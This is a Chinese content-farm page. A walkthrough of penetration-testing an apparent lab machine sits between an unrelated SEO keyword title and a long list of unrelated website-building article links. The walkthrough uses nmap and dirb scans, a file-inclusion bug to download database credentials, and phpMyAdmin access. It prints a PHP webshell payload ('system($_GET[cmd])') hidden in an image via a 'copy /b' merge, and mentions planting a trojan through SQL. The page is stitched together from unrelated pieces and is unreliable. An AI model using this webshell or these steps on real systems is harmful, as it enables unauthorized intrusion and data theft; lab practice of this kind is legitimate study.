当前位置: 首页 > news >正文

网站建设协议 合同网络编程学校

网站建设协议 合同,网络编程学校,网站开发工程师项目经验怎么写,wordpress连不上mysql8一、信息收集 1、探测内网主机IP可以使用各种扫描工具比如nmap#xff0c;我这里用的是自己编写的。 nmap -n 192.168.12.0/24 #扫描IP#xff0c;发现目标主机 2、先不着急#xff0c;先收集一波它的端口#xff08;无果#xff09; nmap -n 192.168.12.136 -p 1-10000…一、信息收集 1、探测内网主机IP可以使用各种扫描工具比如nmap我这里用的是自己编写的。 nmap -n 192.168.12.0/24  #扫描IP发现目标主机 2、先不着急先收集一波它的端口无果 nmap -n 192.168.12.136 -p 1-10000  #可以看到它只有22个80 3、进入web界面查看 不错我也是海迷这个界面说的sql注入尝试一番后无果果断跳过。继续收集信息。 4、扫描路径dirb http://192.168.12.136/in 路径中有phpinfo() 我们可以看到有文件包含 http://192.168.12.136/test 这个界面存在文件包含  利用这个漏洞读取一波文件 通过一波搜索找到  c.php  文件为它的数据库文件连接信息 使用文件包含来把c.php直接下载下来 代码如下  直接登录phpmyadmin目录直接查看数据库 二、信息利用 1、获取了数据库账号和密码直接登录phpmyadmin目录直接查看数据库数据 查找http://192.168.12.136/phpMyAdmin目录,在尝试几次后人品爆发找到了 http://192.168.12.136/phpmy/index.php  完成拖库 进入界面 2、文件下载利用——默认的配置文config.inc.php应该和phpMyAdmin/index.php在同一级目录下。尝试下载 config.inc.php的内容。说实话这个东西一般人也发现不了而且配置信息也不会这样写。 通过这个账号密码可以直接登录root用户 3、上传图片马上传图片马的时候一定要注意 图片原始的内容 像图片中带有 ? 这种符号的会直接影响我们的php木马的结构导致比如system和eval无法执行。 ①木马内容 ##$ GIF89a ?php system($_GET[cmd]); ? ##$ ②使用cmd与png进行合并                 copy 111.png/b 1.php/a 555.png ③上传图片然后使用 4、直接使用sql语句来植入木马 1、查看sql权限可以看到允许任意文件读取和写入。 六、它还开启了22号端口那么直接把它的/etc/passwd下载下来进行尝试爆破无果
http://www.dnsts.com.cn/news/256539.html

相关文章:

  • php企业网站例子wordpress加群插件
  • 网站建设需要投资多少一键优化表格
  • 网站怎样做漂浮外贸网站用什么空间
  • 芜湖网站建设芜湖酒店装修
  • 网站开发运营wordpress 排版代码
  • 福州外贸建站wordpress电子书下载地址
  • 做网站兼容性如何处理纯静态网站开发
  • 洪湖网站建设设计开发流程图
  • 有本地服务器怎么做网站云南网站建设模块
  • 利用渗透的网站做寄生虫郑州企业网站排名优化方法
  • 请人做网站收费多少钱建设公司网站 优帮云
  • 怎么在手机上制作网站高手总结wordpress函数
  • 区块链资讯网站建设湖南长沙新增病例最新消息
  • 大型的网站后台用什么做商务网站建设的项目体会
  • 效果好的徐州网站建设服务器价格购买价格表
  • 石家庄seo网站优化报价深圳网站设计公司是什么
  • 杭州网站 建设弹幕网站用什么做
  • wordpress的商城网站制作公司水墨网站设计欣赏
  • 绵阳观察怎么登录不上苏州seo排名优化课程
  • 四川省凉亭建设工程有限公司网站七牛图床 wordpress
  • 网站建设大作业电子版山东省城乡建设厅网站
  • 天津制作公司网站网站开发的进度安排
  • 宁夏考试教育网站wordpress底部版权
  • 便宜虚拟主机做网站备份化妆品网站建设目标
  • 网站建设 归为会计哪一类淘宝客网站建设的策略
  • 百度网站链接提交怎么注销公司法人身份
  • 长安网站建设网络推广郑州有什么好玩的
  • 网站升级建设费用福建网站建建设
  • 天津电子商务网站建设公司辽宁建网站
  • 建立网站的申请建设学校网站多钱